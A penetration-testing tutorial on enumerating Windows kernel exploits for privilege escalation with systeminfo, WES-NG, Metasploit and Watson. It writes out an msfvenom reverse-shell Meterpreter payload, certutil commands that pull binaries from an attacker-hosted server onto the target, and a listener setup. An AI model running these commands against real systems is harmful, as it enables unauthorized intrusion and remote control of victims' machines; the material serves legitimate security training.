Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

MANUAL ENUMERATION

  1. Use the systeminfo command to collect detailed information about the system, including the OS version, system architecture, and installed hotfixes (KBs).
    systeminfo

    NOTE: In the provided output, we can identify the system as a Windows 7 Pro – Build 7601 – x64-based (64-bit). Additionally, it shows that three hotfixes have been installed on this host.

  2. To obtain more specific details about the installed hotfixes, use the following command:
    wmic qfe get Caption,Description,HotFixID,InstalledOn

    NOTE: Microsoft has shifted from using MS bulletin numbers (e.g., “MS17-010”) for their disclosed vulnerabilities. Starting in late 2017/early 2018, Microsoft now references vulnerabilities using the CVE (Common Vulnerabilities and Exposures) system. As a result, modern kernel exploits are labeled with CVE-20XX-XXXX identifiers.

ENUMERATING WITH WINDOWS EXPLOIT SUGGESTER

  1. Run the systeminfo command on the target machine to gather system information. Copy the output and save it to a TXT file on the attacker machine.

  2. Ensure you have the latest exploits by updating the WES-NG database:
    python3 wes.py --update

  3. Use WES-NG to analyze the gathered system information and identify potential kernel exploits:
    python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

ENUMERATING WITH METASPLOIT

  1. Generate a reverse TCP Meterpreter payload based on the target's architecture (either x86 or x64) and save it as an executable file
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-ADRESS] LPORT=1337 -f exe > shell-x64.exe

    NOTE: The built-in Local Exploit Suggester module in Metasploit can be used to identify potential kernel exploits.

  2. Host the payload binary using Pythong HTTP server and transfer it to the target Machine with certutil.
    certutil -urlcache -f http://[IP-ADRESS]:8000/accesschk64.exe accesschk64.exe

  3. On the attacker machine, start a multi-handler listener in Metasploit with the following command:
    msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 1337; run"

  4. By executing the reverse shell binary, our multi-handler listener should receive a meterpreter shell connection.
    .\shell-x64.exe

  5. Use the following commands in Metasploit to load the Local Exploit Suggester:

    background
search suggester
use 0
set SESSION 1
exploit

  6. After about 1 minute, Metasploit will provide a list of potential kernel exploits that can be used against the host.

ENUMERATING WITH WATSON

  1. Use one of the file transfer techniques from the File Transfer section to Transfer Watson to the target machine.
    certutil -urlcache -f http://[IP-ADRESS]:8000/Watson.exe Watson.exe

    NOTE: Watson supports various versions of Windows 10 (1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004) and Windows Server (2016 & 2019).

  2. Once Watson is on the target machine, execute it and review the output
    .\Watson.exe